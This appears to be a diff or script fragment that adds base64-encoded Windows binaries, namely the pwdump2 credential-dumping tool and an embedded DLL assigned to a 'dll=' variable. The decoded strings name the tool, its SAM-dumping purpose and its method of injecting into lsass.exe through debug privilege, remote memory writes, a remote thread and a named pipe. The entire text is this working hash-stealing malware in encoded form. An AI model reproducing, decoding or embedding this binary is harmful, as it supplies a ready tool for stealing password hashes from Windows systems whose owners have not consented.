+c3MAywJUZXJtaW5hdGVQcm9jZXNzAADaAEdldENvbW1hbmRMaW5lQQCOAUdldFZlcnNpb24AALgB +SGVhcERlc3Ryb3kAtgFIZWFwQ3JlYXRlAADxAlZpcnR1YWxGcmVlAO4CVmlydHVhbEFsbG9jAACY +AlNldEhhbmRsZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0 +dXBJbmZvQQDbAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAwQBGcmVlRW52aXJvbm1lbnRTdHJp +bmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAEDV2lkZUNoYXJUb011bHRpQnl0ZQAZAUdl +dEVudmlyb25tZW50U3RyaW5ncwAbAUdldEVudmlyb25tZW50U3RyaW5nc1cAAFcCUnRsVW53aW5k +AA4DV3JpdGVGaWxlALkARmx1c2hGaWxlQnVmZmVycwAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFyAGkB +R2V0U3RyaW5nVHlwZUEAAGwBR2V0U3RyaW5nVHlwZVcAAJUCU2V0RmlsZVBvaW50ZXIAAM8AR2V0 +Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAACoAlNldFN0ZEhhbmRsZQAA3AFMQ01hcFN0cmlu +Z0EAAN0BTENNYXBTdHJpbmdkAAAAAAAAAAAAAZGkAAAAAAAAAAAAAAAAAAAAAAAEwAUwBBAFMA +UwAuAEUAWABFAAAAUnRsQ29tcGFyZVVuaWNvZGVTdHJpbmcATnRRdWVyeVN5c3RlbUluZm9ybWF0 +aW9uAAAAAE5URExMAAAAClB3ZHVtcDIgLSBkdW1wIHRoZSBTQU0gZGF0YWJhc2UuClVzYWdlOiAl +cyA8cGlkIG9mIGxzYXNzLmV4ZT4KAEZhaWxlZCBzdGFydGluZyBsaXN0ZW4gb24gcGlwZTogJWQu +ICBFeGl0aW5nCgAAAEZhaWxlZCB0byBjcmVhdGUgcmVjZWl2aW5nIHRocmVhZDogJWQuICBFeGl0 +aW5nCgAAAABGYWlsZWQgdG8gb3BlbiBsc2FzczogJWQuICBFeGl0aW5nLgoAAAAARmFpbGVkIGVu +YWJsaW5nIERlYnVnIHByaXZpbGVnZS4gIFByb2NlZWRpbmcgYW55d2F5CgAAAABVbmFibGUgdG8g +ZmluZCBsc2Fzcy5leGUgcGlkIGF1dG9tYXRpY2FsbHkuCllvdSBuZWVkIHRvIHNwZWNpZnkgb24g +dGhlIGNvbW1hbmQgbGluZQoAAAAAVW5hYmxlIHRvIGFkanVzdCB0b2tlbiBwcml2aWxlZ2VzOiAl +ZAoAAFVuYWJsZSB0byBsb29rdXAgcHJpdmlsZWdlOiAlZAoAU2VEZWJ1Z1ByaXZpbGVnZQAAAABV +bmFibGUgdG8gb3BlbiBwcm9jZXNzIHRva2VuOiAlZAoAAABDcmVhdGVSZW1vdGVUaHJlYWQgZmFp +bGVkOiAlZAoAAFdyaXRlUHJvY2Vzc01lbW9yeSBmYWlsZWQ6ICVkCgAAVmlydHVhbEFsbG9jRXgg +ZmFpbGVkOiAlZAoAAFxcLlxwaXBlXHB3ZHVtcDItJWQARHVtcFNhbQBTYW1EdW1wLmRsbABGcmVl +TGlicmFyeQBHZXRQcm9jQWRkcmVzcwAATG9hZExpYnJhcnlBAAAAAEtlcm5lbDMyAAAAACVzAABG +YWlsZWQgdG8gY29ubmVjdCB0aGUgcGlwZTogJWQKAEZhaWxlZCB0byBjcmVhdGUgdGhlIHBpcGU6 +ICVkCgAAAAAAAACBQAAAAAAAAIFAAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAA +AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgwAAaGFAAFhhQAD/////AAoAAAp2 +QAAKdkAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAg +ACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQA +hACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQAB +AAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIA +AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +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 +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFZo6HAAEP8V +FGAAEIs1jGAAEGjccAAQUKOcfwAQ/9ajhH8AEKGcfwAQaMxwABBQ/9aLDZx/ABBovHAAEFGjiH8A +EP/WixWcfwAQaKBwABBSo6B/ABD/1qOUfwAQoZx/ABBohHAAEFD/1osNnH8AEGhkcAAQUaOMfwAQ +/9aLFZx/ABBoQHAAEFKjkH8AEP/Wo4B/ABChnH8AEGgwcAAQUP/Wiw2EfwAQo5h/ABCFyV50RosN +iH8AEIXJdDyLDaB/ABCFyXQyiw2UfwAQhcl0KIsNjH8AEIXJdB6LDZB/ABCFyXQUiw2AfwAQhcl0 +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 